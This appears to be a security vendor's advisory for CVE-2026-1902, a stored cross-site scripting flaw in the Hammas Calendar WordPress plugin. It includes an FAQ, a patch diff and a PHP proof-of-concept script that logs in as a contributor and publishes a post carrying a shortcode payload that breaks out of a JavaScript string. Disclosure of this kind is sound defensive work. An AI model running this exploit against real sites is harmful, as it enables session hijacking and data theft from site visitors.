What is CVE-2026-1902?

CVE-2026-1902 is a stored Cross-Site Scripting (XSS) vulnerability found in the Hammas Calendar plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘apix’ shortcode attribute.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s shortcode handler. An attacker can create a post containing a shortcode that includes a malicious payload, which is executed when another user views the post.

Who is affected by this vulnerability?

All users of the Hammas Calendar plugin version 1.5.11 and earlier are affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Hammas Calendar plugin installed. If it is version 1.5.11 or earlier, your site is at risk. Additionally, review user roles to identify any Contributor-level users.

How can I fix this vulnerability?

The vulnerability has been patched in version 1.5.12 of the Hammas Calendar plugin. Update the plugin to the latest version to mitigate the risk of exploitation.

What does a CVSS score of 6.4 indicate?

A CVSS score of 6.4 is categorized as ‘Medium’ severity. This indicates a moderate level of risk, suggesting that while exploitation is possible, it requires specific conditions such as authenticated access.

What practical risks does this vulnerability pose?

If exploited, this vulnerability can lead to stored XSS attacks, allowing attackers to execute scripts in the context of the user’s browser. This can result in session hijacking, data theft, or malicious redirects.

What is the role of the 'apix' shortcode attribute?

The ‘apix’ shortcode attribute is used within the ‘hp-calendar-manage-redirect’ shortcode to manage calendar redirects. However, due to inadequate sanitization, it becomes a vector for XSS attacks.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an authenticated user can inject a malicious payload into the ‘apix’ attribute. When a victim accesses the modified post, the injected script executes, demonstrating the vulnerability in action.

What steps should I take after updating the plugin?

After updating the plugin, review user roles to ensure only trusted users have Contributor-level access. Additionally, monitor your site for any unusual activity and consider implementing security plugins to enhance protection.

Is there a way to mitigate this vulnerability without updating?

While updating is the recommended solution, you can mitigate risks by restricting access to the plugin’s features for Contributor-level users or implementing input validation measures on your site.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, security advisories from the plugin developer, and security blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1902: Hammas Calendar <= 1.5.11 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'apix' Shortcode Attribute (hammas-calendar)

CVE ID CVE-2026-1902

Plugin hammas-calendar

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.5.11

Patched Version 1.5.12

Disclosed March 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1902:
The root cause is insufficient input sanitization and output escaping in the Hammas Calendar plugin’s shortcode handler. The `HP_Calendar_manage_redirect` function in `hammas-calendar/hp-calendar.php` passes a user-controlled `apix` shortcode attribute directly into a JavaScript string via the `HP_Calendar_manage_url` method. The vulnerable `HP_Calendar_manage_url` function in `hammas-calendar/src/HpPlugin.php` concatenates the `$atts[“apix”]` value into a URL parameter string without validation. An authenticated attacker with Contributor+ privileges can create a post or page containing the `[hp-calendar-manage-redirect apix=”PAYLOAD”]` shortcode. When a user views that page, the malicious payload is embedded within a `document.location.replace()` call, leading to script execution. The patch addresses the issue in two places. First, it sanitizes the `apix` input by casting it to an integer using `absint($atts[“apix”])`. Second, it properly escapes the final URL for JavaScript context using `wp_json_encode($url)` in the shortcode output. This prevents injection of arbitrary strings into the script tag. Exploitation requires the attacker to have permission to publish posts, which Contributor-level users possess. Successful exploitation results in stored Cross-Site Scripting, allowing session hijacking or malicious redirects.

Differential between vulnerable and patched code

Code Diff

--- a/hammas-calendar/hp-calendar.php
+++ b/hammas-calendar/hp-calendar.php
@@ -3,7 +3,7 @@
  * @wordpress-plugin
  * Plugin Name:       Hammas Calendar
  * Description:       Innovaatik Ajahammas plugin for your WordPress homepage. Patients can search free slots. Then authenticate and fill personal data to finalize booking and send directly to Hammas.
- * Version:           1.5.11
+ * Version:           1.5.12
  * Author:            Innovaatik OÜ
  * Author URI:        http://www.innovaatik.ee
  * License:           GPL-2.0+
@@ -17,7 +17,7 @@

 if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly

-define('AJAHAMMAS_PLUGIN_VERSION', '1.5.11');
+define('AJAHAMMAS_PLUGIN_VERSION', '1.5.12');
 define('AJAHAMMAS_CALENDAR_SCRIPT', '/js/hp-calendar-min.js');
 define('AJAHAMMAS_CALENDAR_STYLE', '/css/hp-calendar-min.css');

@@ -34,7 +34,7 @@
 add_shortcode('hp-calendar-manage-redirect', 'HP_Calendar_manage_redirect');
 function HP_Calendar_manage_redirect($atts) {
   $url = HpPlugin::HP_Calendar_manage_url($atts);
-  $code = '<script>setTimeout(function () { document.location.replace("' . $url . '"); }, 1250);</script>';
+  $code = '<script>setTimeout(function () { document.location.replace(' . wp_json_encode($url) . '); }, 1250);</script>';
   return $code;
 }

--- a/hammas-calendar/src/HpPlugin.php
+++ b/hammas-calendar/src/HpPlugin.php
@@ -48,20 +48,20 @@

     public static function HP_Calendar_manage_url($atts)
     {
-        $apixParam = "";
-        if (isset($atts["apix"]))
+        $apix = isset($atts["apix"]) ? absint($atts["apix"]) : 0;
+        $params = [
+            "nonce" => wp_create_nonce("hp_calendar_nonce"),
+        ];
+        if ($apix > 0)
         {
-            $apixParam = sprintf("&apix=%s", $atts['apix']);
-        }
-        $apixParam .= sprintf("&nonce=%s", wp_create_nonce("hp_calendar_nonce"));
-        if (trim(get_option('hp_calendar_manage')) == "")
-        {
-            return sprintf("%s%s", admin_url('admin-ajax.php') . '?action=hp_calendar_request&request=manage', $apixParam);
-        }
-        else
-        {
-            return sprintf("%s%s", get_option('hp_calendar_manage'), $apixParam);
+            $params["apix"] = $apix;
         }
+
+        $baseUrl = trim(get_option('hp_calendar_manage')) == ""
+            ? admin_url('admin-ajax.php?action=hp_calendar_request&request=manage')
+            : get_option('hp_calendar_manage');
+
+        return add_query_arg($params, $baseUrl);
     }

     public static function HP_Calendar_registerScripts()

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1902 - Hammas Calendar <= 1.5.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'apix' Shortcode Attribute
<?php
// Configure target WordPress site and credentials
$target_url = 'http://target-wordpress-site.local';
$username = 'contributor_user';
$password = 'contributor_password';

// XSS payload to inject via the 'apix' shortcode attribute.
// The payload closes the string and function call, then executes alert.
$malicious_apix = '");});alert(document.domain);//';

// Step 1: Authenticate to WordPress and obtain nonce for post creation
$login_url = $target_url . '/wp-login.php';
$admin_ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => 1
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Fetch a nonce for the 'post' action (required by WordPress for new posts)
curl_setopt($ch, CURLOPT_URL, $admin_ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'wp_rest',
    'route' => '/wp/v2/posts',
    '_wpnonce' => '' // This is a simplified example; a real PoC would need to extract a valid nonce from the admin page.
]));
$response = curl_exec($ch);
// In a full implementation, you would parse the admin page to get a valid nonce.
// For brevity, this PoC assumes the attacker can manually obtain a nonce.

// Step 3: Create a new post containing the malicious shortcode
$create_post_url = $target_url . '/wp-json/wp/v2/posts';
$post_data = [
    'title' => 'Test Post with XSS',
    'content' => '[hp-calendar-manage-redirect apix="' . $malicious_apix . '"]',
    'status' => 'publish'
];
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
$response = curl_exec($ch);
curl_close($ch);

// If successful, the post URL will be in the response JSON.
// Any user visiting that post will execute the JavaScript payload.
echo "PoC executed. Check the created post for XSS.";
?>

Frequently Asked Questions

What is CVE-2026-1902?
Overview of the vulnerability
CVE-2026-1902 is a stored Cross-Site Scripting (XSS) vulnerability found in the Hammas Calendar plugin for WordPress. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘apix’ shortcode attribute.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s shortcode handler. An attacker can create a post containing a shortcode that includes a malicious payload, which is executed when another user views the post.
Who is affected by this vulnerability?
Identifying vulnerable users and versions
All users of the Hammas Calendar plugin version 1.5.11 and earlier are affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify affected versions
To check if your site is vulnerable, verify the version of the Hammas Calendar plugin installed. If it is version 1.5.11 or earlier, your site is at risk. Additionally, review user roles to identify any Contributor-level users.
How can I fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 1.5.12 of the Hammas Calendar plugin. Update the plugin to the latest version to mitigate the risk of exploitation.
What does a CVSS score of 6.4 indicate?
Understanding the severity rating
A CVSS score of 6.4 is categorized as ‘Medium’ severity. This indicates a moderate level of risk, suggesting that while exploitation is possible, it requires specific conditions such as authenticated access.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
If exploited, this vulnerability can lead to stored XSS attacks, allowing attackers to execute scripts in the context of the user’s browser. This can result in session hijacking, data theft, or malicious redirects.
What is the role of the 'apix' shortcode attribute?
Functionality of the vulnerable parameter
The ‘apix’ shortcode attribute is used within the ‘hp-calendar-manage-redirect’ shortcode to manage calendar redirects. However, due to inadequate sanitization, it becomes a vector for XSS attacks.
How does the proof of concept demonstrate the vulnerability?
Understanding the demonstration code
The proof of concept shows how an authenticated user can inject a malicious payload into the ‘apix’ attribute. When a victim accesses the modified post, the injected script executes, demonstrating the vulnerability in action.
What steps should I take after updating the plugin?
Post-update security practices
After updating the plugin, review user roles to ensure only trusted users have Contributor-level access. Additionally, monitor your site for any unusual activity and consider implementing security plugins to enhance protection.
Is there a way to mitigate this vulnerability without updating?
Alternative protective measures
While updating is the recommended solution, you can mitigate risks by restricting access to the plugin’s features for Contributor-level users or implementing input validation measures on your site.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found in the official CVE database, security advisories from the plugin developer, and security blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations